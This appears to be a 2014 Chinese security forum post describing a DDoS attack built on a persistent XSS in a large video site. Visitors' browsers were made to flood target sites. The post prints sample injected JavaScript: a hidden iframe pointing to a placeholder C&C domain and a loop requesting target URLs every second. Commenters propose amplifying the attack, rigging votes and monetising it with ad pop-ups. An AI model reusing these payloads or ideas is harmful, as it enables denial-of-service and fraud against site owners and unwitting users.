from: One of World’s Largest Websites Hacked: Turns Visitors into “DDoS Zombies”

incapsula发现其一个客户遭受了应用层的DDos攻击。

大概有22000的互联网用户对其网站发起了2000万的GET请求。

该攻击是利用的一个持久性XSS,通过找到一个访问量很大网站的xss,在其网站上插入一段js代码,当其用户访问网站之后,就可以利用该网站的用户对其受害者发起攻击。

一个持久性XSS

几种示例代码:

// JavaScript Injection in <img> tag enabled by Persistent XSS
<img src="/imagename.jpg"  />

// Malicious JavaScript opens hidden <iframe>
function ddos(url) {
$("body").append("<iframe id='ifr11323' style='display:none;' src='http://c&cdomain.com/index.html'></iframe>"); }

// Ajax DDoS tool in executes GET request every second
<html><body>
<h1>Iframe</h1>
<script>
ddos('http://www.target1.com/1.jpg', 'http://www.target2.com/1.jpg');
function ddos(url,url2){
  window.setInterval(function (){
    $.getScript(url);
    $.getScript(url2);
      },1000)
}
</script>
</body></html>

这种攻击方式在找到访问量巨大的视频网站的xss之后,非常好用,因为一般的视频时间不短,这样访问者在访问视频网站观看视频的时间段内,就不知不觉的成为攻击者的工具对其受害者网站不断的发送请求。

此次被利用的是sohu视频,全球网站流量排名27,可在视频区域插入xss代码,控制观看该视频的用户对受害者不断的发送请求。

注:攻击的效果就是每秒都请求一次url和url2指定的连接,如果一段视频30分钟,那么每个用户都能在看视频这段时间内向两个目标分别发出 1800 次无意义的攻击请求(如cc),如果是成千上万的人看个热门视频的话。。。

[原文地址]

相关内容:

1#

jeary ((:‮?办么怎,了多越来越法方象抽的我)) | 2014-04-30 14:53

2#

昵称 (</textarea>'"><script src) | 2014-04-30 14:54

撸主亮了

3#

核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2014-04-30 14:55

赞一个!

4#

x0ers (第一个知道牛奶能喝的人都对奶牛做了些什么?) | 2014-04-30 15:00

思路不错

5#

疯狗 (你在乌云这么叼,你家人知道么?) | 2014-04-30 15:04

以前有个同事用视频和门户站的评论XSS漏洞刷过票,效果超好根本都停!不!下!来!

(当然是比较次的投票,GET型的,最后网站巨慢无奈给评论刷到第二页,但仍然有流量,最后票数太离谱了。。。)

有大量并源源不断的“攻击源”参与进来,而且访问都真实。。。

6#

rayh4c | 2014-04-30 15:06

用HTML5加个多线程吧,不过有时候会被卡死。

7#

ppt (maodun.github.io)‮(|nuf rof gnikcah|) | 2014-04-30 15:07

思路不错,不知道d的谁

8#

疯狗 (你在乌云这么叼,你家人知道么?) | 2014-04-30 15:22

@rayh4c 你这是恨之入骨模式

9#

李旭敏 ((҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉) | 2014-04-30 15:29

如果发出这样的请求,网速肯定会有影响把?

为什么没有杀软察觉到?

10#

7dscan | 2014-04-30 15:34

干referer?

11#

0x_Jin (世上人多心不齐) | 2014-04-30 15:37

@李旭敏 这为什么会被查? 难不成get请求都不能发了?加载一个图片就是发get 如果你要拦截get 那图片都无法加载了

12#

超威蓝猫 (‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮) | 2014-04-30 15:38

@李旭敏 杀软不认为这些HTTP请求是异常的 ._.

13#

疯狗 (你在乌云这么叼,你家人知道么?) | 2014-04-30 15:47

@李旭敏 @超威蓝猫 嗯,而且很多网站(比如微博私信、比特币行情)也会定时发送ajax请求获取最新数据,频率也不低,都是正常的请求。

14#

xsser (十根阳具有长短!!) | 2014-04-30 15:53

xss也应该按照影响来分

15#

insight-labs (Root Yourself in Success) | 2014-04-30 18:22

之前朋友的站被用这种方法D,我找了个高带宽服务器加了个varnish做反向代理扛过去了。

16#

mramydnei | 2014-04-30 18:25

@insight-labs 哈哈

17#

伪装 (求基友。加我QQ送Qb!sa@0day.so) | 2014-04-30 20:59

换成广告弹窗,一个广告弹出来了多少次就换下一个,放广告的机器用高防的.暴利阿..

18#

0749orz (一头人,牵着一头牛!) | 2014-04-30 21:19

D,电信服务器去!北京总部!

19#

Levine | 2014-04-30 22:14

http://wooyun.org/bugs/wooyun-2014-054174 大家好 我来了

20#

草榴社区 | 2014-04-30 23:53

@疯狗 这个.我也用过...确实爽.尤其是验证IP,没有验证码的.

21#

最热微博 (我的钢笔是黑的!) | 2014-05-01 02:10

赞一个!

22#

紫衣大侠 | 2014-05-09 10:30

略屌~

23#

我是一只小毛驴 | 2014-05-09 10:53

为毛我不能发主题的贴子,@xsser @肉肉

24#

浅兮 (初中生) | 2014-05-09 12:36

这篇文章不错!

25#

LaiX ([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+(!![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+!+[]]]]][([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+) | 2014-05-09 18:28

那应该叫 cc攻击 ,不叫DDOS

26#

Mujj (Krypt VPS特价www.80host.com) | 2014-05-09 19:15

@LaiX DDOS全称拒绝服务攻击。

27#

LaiX ([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+(!![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+!+[]]]]][([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+) | 2014-05-09 19:47

@Mujj 那个 你能百度一下我说的CC攻击吗

28#

px1624 (aaaaaaaaa) | 2014-05-09 20:21

这个漏洞貌似我提交过 2013-08-11 http://wooyun.org/bugs/wooyun-2013-034003

29#

Mujj (Krypt VPS特价www.80host.com) | 2014-05-09 21:29

@LaiX 呵呵

30#

Yatere (so do you) | 2014-05-29 00:01

其实可以好好利用这个,不要只是cc。

用js也可以post的。

相关内容:

Using Facebook Notes to DDoS any website

超过16W的WordPress网站被用来做DDoS攻击

Bitcoin startup BIPS loses $1 million after DDoS heist

Zmap详细用户手册和DDOS的可行性

打造TB级流量DDoS大杀器,超级流量反射放大攻击系统

【逆向爆菊】某DDOS事件逆向追踪。。。有人深挖过吗?

云计算做数据包分析防御DDOS攻击

超级短信DDOS 女生一天收上万条10086短信 还有近50万条等着她

黑客可利用云开发平台进行DDOS攻击

基于云计算的DDOS攻击缓解方案

迅雷云你伤不起啊,利用迅雷云资源绑架用户,发起大型DDOS攻击

史上最大流量DDOS攻击者被捕

分析:DDos攻击被更有针对性地应用

一段黄色笑话引发的DDoS攻击

US-CERT:DNS服务器配置不当是上周300G DDoS的元凶

基地组织官网遭受海量ddos攻击

DDoS 攻击转移到 IPv6

Asp + 后台服务控制的 DDOS 木马,整套源码下载

浅谈Ddos攻击攻击与防御

T00ls.Net 征集 DDOS、CC 防御解决方案

【CSRF】基于图片方式(<img)的 DDOS、CC、会话劫持以及刺探用户信息

电磁风暴超暴力 PHP DDOS 攻击工具 & PHP DDOS 攻击 - 编年史

美国热炒解放军网络战能力 国产神器!军工级暴力DDOS攻击系统!

男子转嫁黑客攻击致金盾网瘫痪 被DDOS请勿乱指域名到政府网

利用P2P网络发动大规模、大流量DDOS攻击

Linux 系统下 DDOS 工具 tfn2k 攻击原理详解

【批处理】批处理、Bat 也能进行 DDOS 攻击?

【Asp代码】用Asp来搞DDOS攻击

DRDoS 反弹DDoS攻击 反弹DDoS攻击 力度远大于分布式DDOS攻击

留言评论(旧系统):

佚名 @ 2014-05-01 11:16:40

DDOS已经走进高科技时代了

本站回复:

其实这种方式很多年前就有了,只是一直没有大规模应用,而且防御起来很简单……